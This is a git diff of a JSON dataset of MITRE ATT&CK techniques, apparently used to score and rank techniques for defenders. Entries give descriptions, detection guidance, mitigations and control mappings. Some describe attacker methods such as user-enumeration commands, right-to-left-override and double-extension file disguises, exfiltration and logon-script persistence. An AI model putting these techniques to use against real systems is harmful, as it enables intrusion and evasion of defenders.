         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.09523809523809523,
-            "mitigation_score": 0.16363636363636364,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1033",
-        "name": "System Owner/User Discovery",
-        "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.",
-        "url": "https://attack.mitre.org/techniques/T1033",
+        "tid": "T1018",
+        "name": "Remote System Discovery",
+        "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n",
+        "url": "https://attack.mitre.org/techniques/T1018",
         "tactics": [
             "Discovery"
         ],
-        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)",
         "platforms": [
             "Linux",
             "Windows",
@@ -1706,14 +1957,16 @@
         ],
         "data_sources": [
             "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
             "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.2957034652380952,
-        "adjusted_score": 0.2957034652380952,
+        "cumulative_score": 0.30044282095238095,
+        "adjusted_score": 0.30044282095238095,
         "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
@@ -1726,634 +1979,741 @@
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.1952380952380952,
-            "detection_score": 0.41
+            "combined_score": 0.18095238095238095,
+            "detection_score": 0.38
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0.00046537
+        "prevalence_score": 0.01949044
     },
     {
-        "tid": "T1036",
-        "name": "Masquerading",
-        "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)",
-        "url": "https://attack.mitre.org/techniques/T1036",
+        "tid": "T1020",
+        "name": "Automated Exfiltration",
+        "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).",
+        "url": "https://attack.mitre.org/techniques/T1020",
         "tactics": [
-            "Defense Evasion"
+            "Exfiltration"
         ],
-        "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nLook for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters\"\\u202E\", \"[U+202E]\", and \"%E2%80%AE”.",
+        "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
         "platforms": [
-            "Containers",
             "Linux",
+            "Network",
             "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Metadata",
-            "File: File Modification",
-            "Image: Image Metadata",
-            "Process: Process Metadata",
-            "Scheduled Job: Scheduled Job Metadata",
-            "Scheduled Job: Scheduled Job Modification",
-            "Service: Service Creation",
-            "Service: Service Metadata"
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Script: Script Execution"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1036.001",
-                "name": "Masquerading: Invalid Code Signature",
-                "url": "https://attack.mitre.org/techniques/T1036/001",
-                "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.",
-                "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.",
-                "mitigations": [
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    }
-                ]
-            },
-            {
-                "tid": "T1036.002",
-                "name": "Masquerading: Right-to-Left Override",
-                "url": "https://attack.mitre.org/techniques/T1036/002",
-                "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
-                "detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1036.003",
-                "name": "Masquerading: Rename System Utilities",
-                "url": "https://attack.mitre.org/techniques/T1036/003",
-                "description": "Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)",
-                "detection": "If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)",
-                "mitigations": [
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1036.004",
-                "name": "Masquerading: Masquerade Task or Service",
-                "url": "https://attack.mitre.org/techniques/T1036/004",
-                "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)",
-                "detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1036.005",
-                "name": "Masquerading: Match Legitimate Name or Location",
-                "url": "https://attack.mitre.org/techniques/T1036/005",
-                "description": "Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.\n\nAdversaries may also use the same icon of the file they are trying to mimic.",
-                "detection": "Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.\n\nIf file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)\n\nIn containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.",
-                "mitigations": [
-                    {
-                        "mid": "M1045",
-                        "name": "Code Signing",
-                        "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                        "url": "https://attack.mitre.org/mitigations/M1045"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1036.006",
-                "name": "Masquerading: Space after Filename",
-                "url": "https://attack.mitre.org/techniques/T1036/006",
-                "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt  (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.",
-                "detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1036.007",
-                "name": "Masquerading: Double File Extension",
-                "url": "https://attack.mitre.org/techniques/T1036/007",
-                "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
-                "detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)",
+                "tid": "T1020.001",
+                "name": "Automated Exfiltration: Traffic Duplication",
+                "url": "https://attack.mitre.org/techniques/T1020/001",
+                "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
+                "detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ",
                 "mitigations": [
                     {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
                     }
                 ]
             }
         ],
+        "mitigations": [],
+        "cumulative_score": 0.15735438714285716,
+        "adjusted_score": 0.15735438714285716,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.057142857142857134,
+            "detection_score": 0.12
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00021153
+    },
+    {
+        "tid": "T1020.001",
+        "name": "Automated Exfiltration: Traffic Duplication",
+        "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.",
+        "url": "https://attack.mitre.org/techniques/T1020/001",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ",
+        "platforms": [
+            "Network"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1020",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1045",
-                "name": "Code Signing",
-                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
-                "url": "https://attack.mitre.org/mitigations/M1045"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             }
         ],
-        "cumulative_score": 1.619047619047619,
-        "adjusted_score": 1.619047619047619,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
+        "cumulative_score": 0.28571428571428575,
+        "adjusted_score": 0.28571428571428575,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
-            "2.5",
-            "2.7",
-            "3.3",
-            "4.1",
-            "6.1",
-            "6.2",
-            "6.8"
+            "3.10",
+            "4.2",
+            "4.6"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-6",
-            "CA-7",
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
+            "AC-4",
+            "CA-3",
             "CM-2",
             "CM-6",
-            "CM-7",
-            "IA-9",
-            "SI-10",
-            "SI-3",
+            "CM-8",
+            "SC-4",
+            "SC-7",
+            "SC-8",
+            "SI-12",
             "SI-4",
             "SI-7"
         ],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.519047619047619,
-            "mitigation_score": 0.34545454545454546,
-            "detection_score": 0.71
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 1
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1037",
-        "name": "Boot or Logon Initialization Scripts",
-        "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.",
-        "url": "https://attack.mitre.org/techniques/T1037",
+        "tid": "T1021",
+        "name": "Remote Services",
+        "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
+        "url": "https://attack.mitre.org/techniques/T1021",
         "tactics": [
-            "Persistence",
-            "Privilege Escalation"
+            "Lateral Movement"
         ],
-        "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+        "detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \n\nUse of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \n\nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Object Modification",
             "Command: Command Execution",
-            "File: File Creation",
-            "File: File Modification",
-            "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Creation"
+            "Logon Session: Logon Session Creation",
+            "Module: Module Load",
+            "Network Share: Network Share Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1037.001",
-                "name": "Boot or Logon Initialization Scripts: Logon Script (Windows)",
-                "url": "https://attack.mitre.org/techniques/T1037/001",
-                "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ",
-                "detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+                "tid": "T1021.001",
+                "name": "Remote Services: Remote Desktop Protocol",
+                "url": "https://attack.mitre.org/techniques/T1021/001",
+                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)",
+                "detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.",
                 "mitigations": [
                     {
-                        "mid": "M1024",
-                        "name": "Restrict Registry Permissions",
-                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                        "url": "https://attack.mitre.org/mitigations/M1024"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1037.002",
-                "name": "Boot or Logon Initialization Scripts: Logon Script (Mac)",
-                "url": "https://attack.mitre.org/techniques/T1037/002",
-                "description": "Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)\n\nAdversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. ",
